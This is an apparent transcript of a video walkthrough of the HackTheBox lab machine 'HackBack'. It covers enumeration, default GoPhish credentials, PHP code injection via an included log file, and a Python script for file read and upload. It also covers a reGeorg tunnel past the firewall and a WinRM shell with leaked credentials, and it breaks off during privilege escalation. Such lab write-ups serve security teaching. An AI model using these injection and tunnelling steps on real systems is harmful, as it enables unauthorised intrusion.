What's going on YouTube? This is Ipsec, and we're doing HackBack from HackTheBox, which is one of my favorite boxes because of why it is difficult. If you understand GetSystem, Windows tokens, impersonation, if you understand those things, this box may not be difficult. If you don't understand those things, this box is going to be difficult until you understand them, and then it's going to be relatively simple. And because of all the support I got on Patreon over the last week, I'm going to throw in some antivirus evasion, which I think everyone will enjoy. But the box also has a really cool theme. It's called HackBack for a reason. Once you scan the IP space, you discover that people are using this box to perform a phishing campaign against 3 or 4 different organizations. So you decide you want to hack back and try to exploit the phishers. And once you do your first exploit, you get a super low privilege shell on their box, which is a Windows 2019. You do some exploit development work, get a low privilege user, and then find a service binary that lets you write anywhere on the operating system. So you combine that write access with the Diagnostic Hub exploit to get code execution, much like any of the recent Sandbox Escaper exploits, where she finds a lot of ways to write a file inside of System32 and then use Diagnostic Hub to exploit it. So with all that being said, let's just jump in and do the box. As always, let's begin with the nmap, so -sc for default scripts, -v enumerate versions, OA output all formats, put in the nmap directory and call it HackBack, and then the IP address, which is 10.10.10.128. It does take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open. That is HTTP on port 80, and that's running IIS version 10. We also have another HTTP service on port quad 6s, and that's running HTTP API version 2.0. We don't have much more information to go off, so let's go take a look at the web servers. But before we do that, let's always do some type of recon in the background, and this time we'll do nmap-p- to do all ports, -v to show open ports as it finds them, -oa to output all formats, put in the nmap directory and call it hackback-all ports, and then the IP address, 10.10.10.128. So now that that is running, let's go take a look at the websites. Going to 10.10.10.128, we just get a picture of a donkey. Doing Control-U to view the page source to see if there's anything hidden on it. Doesn't really look like it. We have samaro.jpg, which may be donkey.jpg in Italian maybe, and then we have ESEL. What is Samaro? Is that Italian? Let's go quickly to translate google.com. Samaro, donkey, and does it say? Italian, yeah. So we got donkey in 2 different languages looking at the page source. Let's take a look at port 6666 to see what is listening there. We have the address is restricted. So let us just manually look at that with curl because I don't feel like changing my Firefox config to let me look at that port. So curl 10.10.10.128 port 6666, and we get missing command. So I'm going to do !command equals test. We don't get anything. Let's do cmd equals test. Don't get anything. And then if we just do test, we get absolutely nothing. So let's look at the header for that, and we get a 404 not found. So I'm just going to try to dir-bust this. And since it's giving me 404s, I'm just going to use GoBuster because that's fast. If it wasn't giving me 404s, I'd probably use wfuzz. So we'll do user share. Let's do seclist, discovery, web content, and we'll do common.txt first and see if this finds it. I just want to pick a nice small word list that will probably have things that are valid commands. So we'll do -u for URL, HTTP 10.10.128 port 6666. So let this go, and we'll see if this finds anything. And while that goes, I do want to look at, oh, never mind. I was going to look at this word list to see exactly how it's formatted, but we see that help and services gives us a 200. So let's do curl 10.10.10.128 port 666/help And we get hello proc who am I list info services netstat and IP config. So if we look at proc, we will get a bunch of JSON that looks like it is the processes that's running on the box. So let us go over to cherry tree, Control-Shift-N to create a subnode, and we'll call this HTTP API 666. And if we do curl help, we get this. So this is going to be all the commands we can probably run through this HTTP API. And there's probably a better way to do this. I'm sure you can do macros or blocks in cherry tree, but oh well. So we have hello, proc, who am I, list, whatnot. So a good way to format through this data is using JQ. So JQ-R, and then I think if we do this, let's see if this works. Name. Curl, failed writing a body, compile error, so that did not work. Where did I go wrong? Do I have to do dot name? Compile error still. Let's hide curl's output, so that's a bit cleaner. So let's see. I think this has to be in quotes, and the period goes here. Try this. Okay. So now let's do that without the jQuery. And we can do name. Then we can do ID. And then path. So this will just be a nice way to format this data a bit better. So let's go over to cherry tree. And let's see. Proc. I'm going to paste what I did so I have a note of the command, because that may be beneficial. So let's paste this. Next command is who am I? So let's take a look at that. Curl who am I? And we get a bunch of information. Holy cow. So let's see. Authentication type, impersonation level. We are network service. Much more information I want to go into, but we are a network service, not running as local admin. So if we look at, let's see what hello is. Hello. Hello, donkey. So that's all that does. We can look at list. List. This is looking at a directory listing. So directory listing. Current user network service info. Let's see what this is. This looks like it's going to be the output of the system info command. And we see we're running, let's see, Windows 2019 server. Does this have hotfixes? Scrolling down. Come on. Fix. OS hotfix is none. So info, server 2019, no hotfixes. However, this is running as a low privilege user, so this may be a permission issue. So let's look at services. And when I say permission issue, maybe the low privilege service can't query the hotfixes, and that's why we're not seeing it. Services, we get a list of all the services. So let's go back to our jQuery command from proc, do services, and grab what we want. So let's do name. We got start name. I don't know if it's case sensitive. Probably is. Display name. I guess we'll do it. Display name. And then dot status. And let's see. wonder if we do /t, if that'll be better. Formatting. No. Let's just look at something else, because we don't need that. That's just all the services running on the box. I guess we could poke at that a little bit, but that is a lot of information to go off of. So let's do NetStat. So go back up. NetStat. And this is, again, tons of information from this command. So let's see. We probably only want local port, owning process ID, and local address. So let's do NetStat. I think it was camel cased, so local. We'll do local address, local port, and what was it? Owning process. We can get rid of this last one. So local address was not one where I typed it. So let's copy this. I have 2 L's in local address. That's it. So now we have a listing of every listening service. So if we went back to our port scan, we see port 64831 is also open to us. If we look here, we have like port 3389 is listening on all interfaces, 135 is. So we know there's a firewall in play because we have listening ports on every interface that is not listening to us. So there is a firewall, and we got a weird port, 64831. So let's look at this. 64831. That is listening. The owning process is 3992. So let's go and do the process command and search for 3992. And we can see GoPhish is listening on port 3992. So 2 different ways to get a listing of everything that's listening on the box. We could do ipconfig, but we don't need that. So let's move on from doing this and look at that GoPhish port. So all that's documented. We can call out interesting NetStat plus, what is it? Proc to get programs listening on ports. And if you want to brush up on your Python, you may want to create a script to curl the process list, getting all the process IDs, and then do a curl against the NetStat and give output that instead of giving you the owning process ID, it'll give you the, this is the ID, second field. But instead of giving you the owning process ID, it gives you the listening port, or owning process name. That would be a fun task to do, but the video would be way too long if I did all those things. So let's just move on. And I said look at port 64831, I think. Let's see if I'm right. So let's do 64831. Did I remember that correctly? We get a bunch of weird characters. Doing Control U to view the source doesn't do anything. This is just an SSL handshake. So let's do HTTPS. And then click Advanced Add Exception. We can view the certificate to see what this says. It's a GoPhish certificate. Looking at the details, I always want to look at like the alternate name or something, see if it leaks a host name. It doesn't look like any host name is leaked. So let's just confirm this and see what the page is. It is the GoPhish application. I'm going to do admin. Doesn't work. Let's just Google GoPhish default credentials. And we see by default it runs on port 3333, username's admin, and password is GoPhish. So let's do admin and then password of GoPhish, and default credentials do work. So let's look at users and groups. We don't have anything. Campaigns, don't have anything. Email templates, and we have a few templates. So let's go take a look at what these templates are. And if you don't know what GoPhish is, it's essentially a program to create phishing campaigns for emails. So let's look at the HTML for this, and we got a URL, http admin.hackback.htb. Looking at Facebook, let's see what this one is. We got another thing, facebook.htb, www.facebook.htb. Let's go look at HackTheBox. And we got, let's see, do we have a URL for HackTheBox? www. Let's see, HackTheBox.htb. So we got a bunch of URLs. So let's go add it to our host name. So etc host, and then do 10.10.10.128. It was what? admin.hackback.htb, www. Is it Facebook, HackTheBox, PayPal, and Twitter? So facebook.htb, HackTheBox.htb, www.paypal.htb, and last one is Twitter. So www.twitter.htb. So let's go take a look at what admin.hackthebox.htb is. We have to probably clear a cache or something. Come on, DNS. Let's just clear everything and see if that fixes it. Clear, history, everything. Go. Oh, it's admin.hackback.htb. There we go. And we get a login panel. If we try admin, nothing works. So let's just try the other ones, www.hackthebox.htb. And we get the HackTheBox login page. If we do www.paypal.htb, we get the PayPal page, and Twitter will be Twitter. So, whoops, www.twitter.htb. So what it looks like is we have stumbled across a like pen testers or hackers phishing campaign host. And he's got a bunch of virtual hosts set up, so when people click his links and they go to a URL, it directs them to the correct phishing page. So if we go to admin login, let's see, do we have lost password? 404. Let's look at don't have an account. 404. So we want to try to hack this guy's C2. So what I'm going to do is see if he has any just files out there on his web server. If we look at the source of the page, we have, let's see, submit, value login, him trying to load JavaScript out of this directory. So let's go into this directory. That is a 404, but let's see if he has any other JavaScript files in this. So what I'm going to do is let's go back to this tab. We can do a Go Buster, and this time we will do, what is it? User share dir buster directory list. Dir buster word list directory list 2.3 medium. Let's do small. Maybe it'll go quicker. And let's see, -u for URL, http admin.hackback.htb/js/ that's it, and -x to do an extension, and we're going to do the extension JS. So what this is doing is taking every line out of this directory, adding .js to it, and seeing if the file exists. So while that goes, let's see if anything happens when we log in. So do test test. We just get nothing. Let's now send this over into Burp Suite, and that was the plugin Foxy Proxy. Clear my intercept queue, test, test, log in. And let's see, we get a token, username, and submit. So where are we submitting to? Just the page itself. Click forward, and doesn't do anything. Looking at the page source, we have mirrored by using the HTTP track website copier. So that is the tool the attacker used to mirror the page. Going back over into GoBuster, we do have a file hit now, private.js. So let's go take a look at that, since we don't have really anything interesting on this login. So let's look at admin.js/private.js. And we have a bunch of gibberish. So some type of JavaScript, INE equals, and I just know this is 13 characters away from VAR. So this is ROT13. If you Google like ROT13 online, ROT13, and it's just a really common encoding technique. So INE is var. So let's just copy all this. And we could paste it all into the website, but generally, like if we just do this, we get the output. But another way to do it is, let's see, let's create a directory JS, and we'll call this private.js, paste it. And I just did that for like note-taking purposes. But if I do Python x equals, and then paste it, so now my x variable is that. Python version 2 has a built-in ROT13 encoder. I think it's just done like this. And you can get the same thing. So let's just copy this, go into JavaScript pretty print. Let's see, online JavaScript beautifier. Paste this, beautify code. So that's going to put line breaks and make it somewhat readable. So this is doing a bunch of things. Let's see. Something defined, var I function, defining a bunch of things. So let's see what it does for x. Oh, man, it's hard to read when I made it this big. Let's see. Start here. Let's not pick x. Let's pick W is probably not used often. Oh, God. Let's just copy this. V pretty.js. Paste. Less this. Search for W. Let's see. While VW equals something. It's hard to quickly see exactly what the script does. So what I'm going to do is the dangerous thing and do some dynamic analysis of the script. So there are websites that run JavaScript for you, or if you're feeling bold, you can just go to Web Developer, Web Console, and we can paste the script in. And it wants us to type allow pasting, and then we can paste this. Paste, allow pasting, paste. Why are you erroring? Unexpected token. paste. There we go. So now if I just type X, Z, can I make this bigger easily? Not really. H, I'll probably just see if I can copy it out of this console. So let's do H, W, T, S, I, K, W. We just ran the JavaScript and got what these variables were. All this above stuff is some decryption library to decode these variables. So let's do decoded.out, paste, and we have X is equal to secure login bypass, Z, remember the secret path, some hash, so let's see. That is all the variables from the site. So looking at this, let's see, the secret path is this. So let's cat this and take a look at this long thing. So we can turn burp off for now. Go back to was admin.hackback.htb, paste that, and it does a redirect. If we go to a path that doesn't exist, we get a 404. So there is probably something in this directory where we know that is a valid directory. So let's do another go bust, and we can do, let's see, we'll do, what is this? If we have index.html, doesn't exist, index.aspx, doesn't exist, ASP, doesn't exist, PHP. So we know this is a PHP page. So let's do the same thing, http admin.hackback.htb / that weird thing, and then -x for PHP scripts. And again, the reason I chose PHP is just because we know the web server host PHP. So let this run, and we'll see if this finds anything. And while that goes, I guess we can take a look again at the output. So we got a variable action with 4 parameters, show, list, exec, init, and then site, Twitter, PayPal, Facebook, HackTheBox, password, and session. So just waiting on this Go Buster. So this is taking absolutely forever. I'm going to do something to speed it up. If you looked at the previous requests, I don't have them in this history, but we're dealing with Windows. And Windows is not case sensitive. So if we do like capitalizations here, we still get the page. So I'm going to change my word list up because I'm tired of waiting. So we'll do directory list dash lowercase 2.3 small.txt. And then we'll do 50 threads. So we'll see how much quicker this goes. And that is only 81,000 requests total versus the last one, which is it going to tell us? We can just do a WC to check. So WC-L, that, and get rid of lowercase. And, oh wow, lowercase doesn't really save that much. So I just wasted quite a bit of time, but thankfully I did 50 threads instead of the default of 10, so it's still going quicker. But I thought there'd be a bigger difference between lowercase and not lowercase. However, back to the waiting game, seeing if we get any hits. So we have a hit on WebAdmin.php, and it's just doing a 301 redirect. So I'm going to do a curl-v, and we'll paste that URL to see where it's redirecting us to. We could do this in burp, but whoops, I did open link. Well, we know where it's redirecting us, right back to the home page. So if we do WebAdmin.php, we see 302 found. We get a session ID. And let's see, where is it redirecting? There's the get location /. So it's just redirecting us to the home page. But if you remember, we have a few parameters. So let's actually go into burp, HTTP history, and grab that last one. And doesn't look like we have it going. Let's see. Filter. We show everything. Let's see, 129. Oh, a web browser considered configured to not go through burp. So let's go through burp / this webadmin.php. Go here, repeater, click go, and we get 302 found. So let's put the parameters that we need. If we go back to our terminal, we have action, site, password, and session. So let's do action. List is probably safe. If we do show, we need to know what are we showing. So list looks like it's going to be the safest one. So action is equal to list. Click go. We still just get that found. Let's do and we'll do site is equal to HackTheBox and password is equal to, I think that was 8 stars. I think I just did 6. 1, 2, 3, 4, 5, 6, 7. We got to do 8. Jesus. The mouse. And the last parameter, session is equal to this. Click go, and we get wrong secret key. So at least it's not redirecting us, or it is redirecting us, but at least it's giving us information on why. So this password part is wrong. So now let's go over to wfuzz and try to fuzz this. So go over to terminal. Let's do this in this pane. And let's see, wfuzz -w for word list. We'll do locate john.txt. wc-l, see how big this is. I hate doing any brute forces over remote brute forces with huge word list. 3000 is fine in length. So let's try this. wfuzz-u http admin.hackback.htb / I have to copy this again. Copy, paste, and where password is, we want to put fuzz. And because we have a lot of special characters in this URL, let's encapsulate them in single quotes. And -w for word list, let's specify this. So click go, and let's hide everything that is only 17 characters. Do have to put this --hc 17. Is it capital C? Did I do that right the correct time? So H is to hide characters, not C. I was doing C because it said capital, but C is response code. H would be hide characters, and 1, 2, 3, 4, 5, 6, 7, 8 gave us a response that was 197 characters. So right off the bat, let's try this. 1, 2, 3, 4, 5, 6, 7, 8. Click go. And we get this array. So I'm not exactly sure what this is showing, but it looks like maybe a file. So if we do action show, site HackTheBox, click go, we get test. If we go back, this is my session. So let's put someone else's session, E6. Does this work? Paste, go. If we do an invalid session, get rid of that D7. Do we not need a session? So we don't need a session there. If we do show, we don't get anything. And then if we do someone else's session, we get wrong identifier. So let's go back and do a list command again. So list, grab ours. So these are just cookie files on the server. This matches what my actual PHP session ID is. So paste this, click go, and then show. So username and password is test. And that happened when we went way back here. If we click off, go to www.hackthebox.htb, and if we do please subscribe, probably mistyped that, click go, username please, password subscribe. So now we've found a way, or found how the hacker gets information out of the login forms. So let's see if there is any code execution. So what I'm going to do is let's go back here, and I'll type it in Burp Suite so it's easier to read. We'll do PHP echo please subscribe, and see exactly how he's calling that. If he's doing like an eval or anything dangerous, we'll get code execution here. So we'll do login, click go, and we see it echoed the password as please subscribe and not the PHP stuff I did. And I could have put that in the username form as well. If we try this and then click go, we see it works here as well. The reason why I did password first is because passwords generally allow for more characters than usernames, so you get more of an attack space. So let us, let's just create a Python script so we don't have to keep doing this. So let's try test, and what we're going to do is PHP base 64 decode, and we'll do eval. And then for the variable, we'll do get ipsec. Okay. So now when we paste this in, click login, click go, we get that. And if we add the variable ipsec and write PHP code, I probably should do echo hello, need quotes. Try this, click go. Do we have hello anywhere? We do not. Did I screw that up? Oh, I did base 64. So echo -n, echo hello, base 64. So URL encode this, go. And now we're just writing raw PHP here. The reason why I did base64 is because we're in a get parameter that has a lot of bad characters. So doing this filters out all those bad characters. So let's see. There is another function that was called init. Let's try that real quick. Init means probably initialize. We see done. If we do our show again, we get nothing. If we go back to the page, test, click go. We have a way to clear the input or output. So let's do this again. Shoot, I got rid of my thing. So we wanted PHP eval base64 decode, and then get the parameter ipsec, and that was it. And what I'm going to do is put something before and after. So when we crawl this with our Python script, we have a regular expression to search for. So I'll do support me on Patreon, and you'll see exactly what this is used for in just a second. But if you did go to patreon.com/ipsec, you can subscribe, and for $10 a month, I give you access to all the raw videos. So that should be fine. Click go. Click go here. And we see support me, hello on Patreon. So now when we go to write a Python script, we can get the output of commands. The only command we verified right now is echo, and that wouldn't be really too helpful. So let's go back to our terminal. And instead of doing echo, let's try system, who am I? So let's see if we can run this. So we'll copy this, and we may need a semicolon. Okay, copy, go here, paste, URL encode, click go, and we don't get anything. So let's try another thing, PHP info, copy, highlight, paste. And I'm pressing Control U to do URL encode. And PHP info also doesn't work. So it's looking like there's a blacklist on PHP commands. So let's see if we can verify that by just running a relatively safe PHP command, just reading files. So let's try reading a file we know exists. This is a Windows box. So we want to do file get contents, and then we'll try to get the contents of Windows system32 license.rtf. And we have to echo it, because file get contents won't print by default. So if we do this, let's do -w0, copy, go back to burp, paste, Control U, go, and we can get the contents of the license file. So we know PHP safe mode is installed, and we can get contents. We can probably list the files and directories as well. So let's start creating that PHP LFI script to automate this, because if we keep going back and doing this manually through burp, it's going to take us eons to enumerate the file system. So let's make dir scripts, cd scripts. We'll call this webadmin.php, and we start off the script by doing user bin python 3, which lets everyone know this is a Python 3 script. And then we need our libraries. So we'll need request, so we can make HTTP request. We need regular expressions, so we can grab what's between support me on Patreon. And then we need base64 stuff. So we'll do from base64 import b64 decode and b64 encode. I do the from base64 instead of just importing base64, so I don't have to type base64 dot 100 times. And then the last thing we need is our terminal. So we'll import this module. And the very first function we want is something to run PHP code. So we'll call a function def run PHP and pass it the argument PHP code. And then we need the URL. So URL is equal to http admin.hackback.htb / and then grab this, paste it in, and now we need parameters. So params is equal to, and we'll grab everything else and paste it, and then convert this into actual parameters. So it wants it in dictionary file, so action show site, whoops, HackTheBox, password is 1234567 session is this, and then IPsec is going to be base64 encode str.encode php code. I need 2 parentheses. So any code we give it, we're encoding it in base64 and putting it in the get parameter. So the next thing I want to do is create proxies, because I always like putting all my scripts through an HTTP proxy like burp. So if it errors out, I can easily debug it. And it also lets me log everything I'm doing to a file in case something does go bad or I lose connection or something. I have history of what I did. Then we need request is equal to request.get URL, params is equal to the params, proxies is equal to proxies, and then this page likes giving us redirect request, so I'm going to say don't allow redirects. And then we need to return our dot content, but this is going to be this entire page. So we need to create another function to just grab the data we want. So we'll do def parse response, and we're giving it the parameter page, and then that's going to be page is equal to page.decode utf-8, and that's because this is going to be binary before. We want to make it UTF-8 so we can search it. And then the next thing we do is m for match is equal to regular expression search, and then support me everything on Patreon, and then give it the page. So now if we have a match, return the decoded contents of M, the very first match, match.group1. And then again, this is probably going to give it in binary format. So we want to pass it in UTF-8 format. And else return 0. Or return 1. Doesn't matter what we return. And now this can be parse response r.content. So now this should create a request and return something. So if we wanted to, actually let's do the terminal first. So class terminal cmd, and I've used this in several videos, prompt please sub, and then I always like creating this initialization function. and then we'll do super. And all this does is goes back to its normal init. If I define this initialization and did like variable equals test, then this function would now error out because it's not doing all its other normal initialization things, which this will tell it to do. So that's why that is there. Let's do def do raw, and we'll pass it the class and then arguments. And now this will just be run PHP and give it args. Okay. So now we do term is equal to terminal and then term.cmd loop. And we can actually print this output. So let's see if this runs. Python 3, WebAdmin. So if I do help, we got undocumented command raw. So if I do raw echo hello world, we have unexpected token allow redirect. I think that's redirects. That's annoying. Echo hello raw, and it's probably going into burp, which is intercepting. Turn that off. Let's see. Invalid base64 string. Number of characters cannot be. What? Let's do raw echo hello and see what this is giving us. So if we go decoder, smart decode, decode as base64, that is what we expected. Send this into repeater. What do we get back? Support me hello on Patreon. Oh, I'm not doing a base64 encode on the output, which I guess I don't have to do. So let's see. Let's just comment this out and print the results. There we go. Python 3, raw, echo, hello, no object decode, raw, echo, hello, and now we're getting output. The reason why I did the base64 is because if we have files with line breaks like I just showed, we can send this over into repeater. So click go, forward. Oh, I didn't want to do that. Repeater, go. We now have on Patreon on a different line, and our regular expression is not catching line breaks. So an easy way to get rid of all line breaks was just base64 encoding the output here. So that's why we have that. So let's get rid of this. And we'll say to do have this base64 encode output. And I'll leave that for an exercise for you. Let's just do the functionality we know we want. So we need to do def do cat self args, and the command in PHP to get files was the file get contents. So we'll do command is equal to echo base64 encode file get contents, and then args 1, 2, 3, and this. We need the semiquote, and that may be good there. So let's print run PHP command. So Python 3, WebAdmin, and turn intercept off, C:, Windows System 32, license.rtf. We need cat. And there we go. Now we're getting the contents of the license file through PHP. So the other command we'll probably want to do is how to ls directories, which we haven't shown yet, but it's relatively easy. So do ls self args command is equal to, we'll type it out in, I guess, pretty format, and then put it all in one line after. So we want to do for each scan dir, which is a PHP function, and then args as file, and then so for each argument as a file, we'll want to create a variable. So in PHP, dot equals is like plus equals in most languages. It just appends to a string. So we'll do file, and then we want to append the file name and do a new line. And I guess we can call this file name to make it a bit more obvious. And period will also join two strings. So we're joining that variable with a new line. And now, let's see. That can go like that. And then the next thing we need is echo base64 encode x. So that is the function we need. So now let's get rid of everything and put this on one line, just so it works easily. Put the semicolon there. And we need to do that. There we go. So now we can just do print run PHP command. ls dot error it out. That's not good. Print command ls dot. So we're doing for each scander this as file name echo base64x. So what I'm going to do, php-a to go in interactive mode, and I think I forgot a parentheses or something because it didn't error out or do anything. It just has something open. So let's paste and look. So 1, 2, and then that's closing that. That's closing that. So that's good. These quotes are closed. So this piece of the code is probably fine. Now we have $x. That is probably fine. And what is not fine is we have two parentheses here, one here. So that's where the code probably broke. So let's add this parenthesis. We can comment that out. ls dot. And yes, we are getting file contents. So clean that up. So I think we are good. So in this init, there's another exercise for you. to do. Run test command. If test fails, we will need to post to www.hackthebox.htb with password is equal to support my PHP eval base64 decode get IPsec Patreon. Something like that. So should be good. This is also got a to do. Grab session ID at start of program. So there's a few things that we could do to improve the script, but for now, I am happy with it because we can do ls on various things and we can cat files. So when I just did ls dot, we got webadmin.php. So if we cat webadmin.php, we see the stuff. And I guess there was a function called cmd that just was a troll. Check password, check session, where is show? Case, show. So it's doing site, check sites, session, check password. So after we pass all the checks, it's doing an include on the log files for the site. And because it's include, it's actually leading to code execution. If instead of include here, it was file get contents, then that PHP stuff we did would not work because file get contents doesn't lead to execution upon reading the file. Using the include function in PHP does, however. So that's why this is vulnerable. So if we do ls dot dot, we have webconfig and webconfig.old. So let's do web.config. Cat. Oh, web dot, actually spell it out. We don't really have anything. Let's look at .old. And we have a username and password, simple, and this. So we should have been taking more notes, but simple and this. Man, I hate having parentheses in, or colons and passwords, because it just makes this look ugly. So, see, what else do we have? I guess we'll need to be able to write files or upload stuff, because we may be able just to upload a script and get code execution that way. So if we do 3 dots, let's see, where is ASPX? Oh, there's a http.ps1. So let's try this. I guess we can't read that. Weird. New fish. HackTheBox. So this is probably the templates. http.ps1. If we do another // see, we got www.root. What's in temp? Nothing interesting. Looking at the root of C, we have GoPhish, which I think, is that where we were? No, it's not. We got config.json. Can we read that? Let's see. Certificates, an SQLite database. So we can try grabbing this. It errored out because it can't decode it. So that could be another to-do. So let's see. LF WebAdmin LFI. Copy this. On cat. To-do. Error. Grabbing SQLite 3 database. So let's see. Let's code the functionality to upload files. So let's do def do upload self args. And now args is going to be 2 arguments. So this will be upload source destination. So we will say source and destination is equal to args.split. Okay. And now, because I'm doing a file, I want to upload one line at a time because I'm very limited with the space I have in a GET request. So this is going to be done through multiple requests. So with open source as read, and we will do for line and handle. Forgot the colon. Base64 line is equal to B64 encode str encode line. So that's just taking every line and putting it into base64. B64 line is equal to B64 line dot decode UTF-8. Okay. Command is equal to, this is going to be the PHP code. So we want to do fp is equal to fopen source a. Oh no, this is going to be destination. And now command plus equals f write fp base 64 decode b64 underscore line. I think that's good. We will print for now for debugging, and then also run PHP command. So let's upload the test.txt hello world. So now let's try upload test.txt to current directory. And now ls to current directory, nothing there. Upload test.txt, one directory up. And I think something's wrong with our upload command. Let's see. Because our fopen is just ... slash. So let's do ... slash test.txt. And let's see. So we're doing fp is equal to fopen test.txt, fwrite, base64, that's a typo. So let's be WebAdmin, base64 decode. And now let's try this again. So upload test.txt to test.txt, ls dot, and we have the file. So cat test.txt, and we can read it. So now we have to figure a way to get code execution on the box. The PHP was in safe mode, so we can't just upload a PHP reverse shell. If you go all the way back with the open ports, we probably have that curl command. If we go to HTTP access, this, no, that's services, NetStat. So if we grab this command and run, we have a bunch of ports locally on this box, like 135, let's see, 5985, which is Windows Remote Shell. And we have credentials. We have that simple and something else. So I want to be able to hit port 5985. However, I need to bypass the firewall. So what I'm going to do is upload a proxy to the box that will let me go over HTTP and hit local ports. So let's go Google, I think it's reGeorg, GitHub. Here we go. This is a really good script. So we can copy this, cd opt, git clone, go in here, and let's see. Tunnel.php. We can, I'm going to try the ASPX first. So let's go back into boxes, cd HTTP boxes HackBack, and now I'm going to go into scripts, copy opt regorge tunnel.aspx, and we'll also need, oh, that's all we need. So let's upload this. So Python, WebAdmin LFI, we need Python 3, upload tunnel.aspx, tunnel.aspx, and we still have our debug on so we can see us sending all the stuff to write the file. So once this is finished uploading, we will test it out. I guess while it uploads, we can go in here and make sure it runs. So this was just testing dependencies to see if we have to do anything. If we do -H, we can see the options. There's a -L to listen on. So we can say port 1080 we want to listen on. And then the URL, which is going to be, go into burp, repeater, here, http admin.hackback.htb/this/tunnel.aspx. So that has finished uploading. If we go here, we do have George says everything seems fine. If we do proxy chains nc-zv 127.0.0.1 port 445, we get connection refused. So let's look in our proxychains.conf. We have SOX5 going through port 1080. That looks fine. 127.0.0.180 connection refused as well. So something is wrong. Starting SOC server. Let's see. Python this -h, listen on read buffer. Oh, listen on -p, listen port. And -l, we can say 127.0.0.1. There we go. So listening on the IP localhost on port 1080. So now let's try this. And we get it connected, and we have this going through the port. So if we do 5985 for WinRM, we also get a connection. So the next thing we need to do is, what do I have? I guess I can delete this. Weird, I had it in both places. I guess I accidentally copied it. But anyways, we can create a test for WinRM. So let's see, if I find ... grep WinRM, do I have anything? I guess I reverted the box and deleted it. So let's Google WinRM with file upload Alamot. I think that's it. WinRM shell. Does this have upload capabilities? Looks like it does. So we've covered this a few times. You can read that blog post if you want more. But we'll do WinRM with upload.rb, set paste, paste it in, and let's see, username and password. So the username was simple. I put the password in cherry tree. Creds. And this came from the web config. So we're going to try this. Password is this. Okay. And this can be 127.0.0.1, port 5985. And if you wanted to test creds first, let's see what version of crackmap.exec I have. That's taking a while to run. Okay, that's a fine version. So we could do proxy change crackmap.exec, smb-u simple-p, paste the password, and then localhost. And that did not seem to work. What did I screw up? CME-u. What if it doesn't like that? Let's try SMB map. -u simple -p this 127.0.0.1 proxy chains. And we'll see if it authenticates. So it did authenticate. Doesn't say we have admin access, doesn't say we have C access, does say we have IPC access. If we didn't put a valid password here, we'll get access denied. So this is why I jumped straight to WinRM, because WinRM won't require administrative access while 445 will. So this looks good. Proxy chains. Proxy chains Ruby. And let's see, require. Let's do head-1 gem install winrm-fs. I guess I reverted to a really old snapshot. Okay, and SSL returned an error because we are on port 5985. That is HTTP. So we have to get rid of the SSL, or if I think 5986 is open, we could use SSL, but I don't think it was. And in PowerShell remoting, it doesn't let you do plain text over the network to my knowledge, but we're not going over the network to the box because we're going to a proxy to itself and doing localhost. So we should be able to do 5985 and then transport. Is it HTTP? No. SSL negotiate plain text from the error message. Plain text. And SSL wrong version number and connect. Let's see. HTTP. And the next one may be, let's try one other thing. This transport SSL. I think it was the endpoint I needed to change, not the other thing. So we get authorization error. Now let's do this. Come on. There we go. Now we have a shell as the simple user. So the change we had to make, let's do this. We had to change this endpoint to be HTTP. The IP's localhost, the port's 5985. Transport remains SSL, user simple, password is whatever this means. So with this shell, we can see what is on this box now. It is relatively slow. By relatively, I mean extremely slow. I actually think doing the LFI may be faster to navigate around. ls ... Yeah, that's almost instant. So I'm still going to use this to navigate around the box because it is faster than doing the proxy chains. So let's look at what's in this util folder. We have a few executables, psep, psftp, ping castle, raw cap. I don't know what this curb whatever is. We have a ms.hta. We can see what that is. I have no idea. PowerShell doing something on 443. Application bonjour. Not sure what that's doing, but I don't see any credentials or anything useful there. So let's try going back in this util, go to scripts, and we can't get in scripts. But remember, this service is probably network service, while this may have access. CD, wait, are we the same user? Oh no, yeah. When we did the way back when we played with this, we knew the web service was running as network service. So we use creds, and now we are the simple user. So let's go back in here, go into Ruby, do a dir. And we don't see a scripts directory, but we saw one with this. So it's probably hidden. So if we do dir/a, we're in PowerShell. So we want get child items. Is it item or items? Let's get a new line. Get child item dot -hidden to display hidden directories. And we see the scripts directory. So if we go into scripts, did it let us into scripts? That's weird. Could not find the item. Do a dir. Well, we're now in the scripts, but our PowerShell is erroring every time because of some weird permission. But we got backup.bat, batch.log, clean.ini, dellog.ps1, and log.txt in this spool directory. So if we do type, let's just do cmd/c type backup.bat. We could do, I think, get content for PowerShell reading files. I'm just more confident with the batch. So backup.bat is running this, and I don't have up and down arrows. Additionally, having all this logging is annoying, so I'm just going to kill my shell and redo this. I'm going to change up our strategy a little bit. So rl wrap, this is a readline wrap, which will give us the up and down arrows as well as the ability to clear a screen with Control-L. So let's go to cd/util, and as long as we don't go into that weird scripts directory, we won't get those error messages. So what I'm going to do, cmd/c dir/a to show all hidden files, scripts, and we can look at everything. So there's backup.bat, which we know what it did. So if we do cmd/c type backup.bat, we need to do scripts. It just runs an X copy. There is batch.log, which looks like it was ran a minute ago. So if we do shell type batch.log, we see the output is the Friday starting bat, dir access is denied, and it's calling dellog.ps1. This backup.bat file did not call that, but there is a dellog.bat. So let's see what this file is. So cmd/c, look at dellog.bat, and we can see this is most likely it, because we got the echo date time start bat, then PowerShell executing it, and then /f whatever. So this is most likely the script. And let's see, can we get access to this dellog.ps1? So let's do dellog.ps1. It does not let us. Can we edit this? So do cmd/c icackles. And we can see what this .bat file is. The group project managers can edit this bat file. So if we do, is it net local group project-managers? I think that will list group members. Come on. We can see Hacker and Simple are members of project managers. So we have to be either administrator or system to edit dellog.bat. But we did get another user, the hacker user. If we look at dellog.ps1 with icackles, we can't even list the file permissions of that, so we don't know who can edit that PowerShell. So let's do a dir again, dir/a on scripts. And again, the /a is doing all just to show hidden files. We can do the icackles on batch.log. And we can see the hacker user can edit batch.log. We can't. We have read execute, but hacker has full access. So I believe the hacker user probably owns this file, and if he owns this file, it means he's the one writing it. So that we do have a clean.ini, which is a configuration file. So let's look at this configuration file to see if we can do anything with it. So doing icackles against it shows that project managers have modify access over it, which we're a member of. So we can edit this configuration file. If we do type to read it, let's see what it is. We got lifetime 100, log file c:\/ util scripts log.txt. So let's do icackles against log.txt because that's the one it's definitely writing to as well. And hacker has control over that as well. So again, looking like he owns everything. So what we have to do is have the user connect back to us. And that's actually a security vulnerability if we have the SE impersonate privilege. So let's do whoami/all and see what tokens we have. We do have SE impersonate. And if this wasn't 2019, I would have went straight to Rotten Potato, which is very easy to get working on non-2018 boxes. On 2019, Microsoft made a change where you can't change the port. So Rotten Potato essentially works by making a COM request to have the system talk back to you on a non-standard port which you can listen on. And when you 